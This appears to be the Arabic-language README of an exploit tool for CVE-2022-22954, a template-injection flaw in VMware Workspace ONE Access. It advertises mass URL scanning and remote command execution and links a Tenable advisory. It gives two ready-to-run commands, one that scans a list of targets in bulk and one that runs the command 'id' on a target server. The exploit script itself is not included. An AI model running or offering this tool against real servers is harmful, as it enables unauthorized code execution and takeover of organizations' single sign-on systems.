
توفير فحص جماعي لعناوين URL وتنفيذ الأوامر. ثغرة حقن القوالب في Workspace ONE Access، تمكن من تنفيذ أكواد عشوائية.
يوفر Workspace ONE Access بوابة تطبيقات موحدة، يمكن من خلالها الوصول الآمن إلى جميع تطبيقات المؤسسة، ويمكن استخدامه لتسجيل الدخول الموحد. في CVE-2022-22954، يمكن للمهاجم إنشاء طلب ضار يؤدي إلى حقن القالب، وتنفيذ تعليمات برمجية عشوائية، والتحكم في الخادم.
https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011
python3 CVE-2022-22954.py -m scan -f 123.txt

python3 CVE-2022-22954.py -u https://xxx.xxx.com:8443 -c id
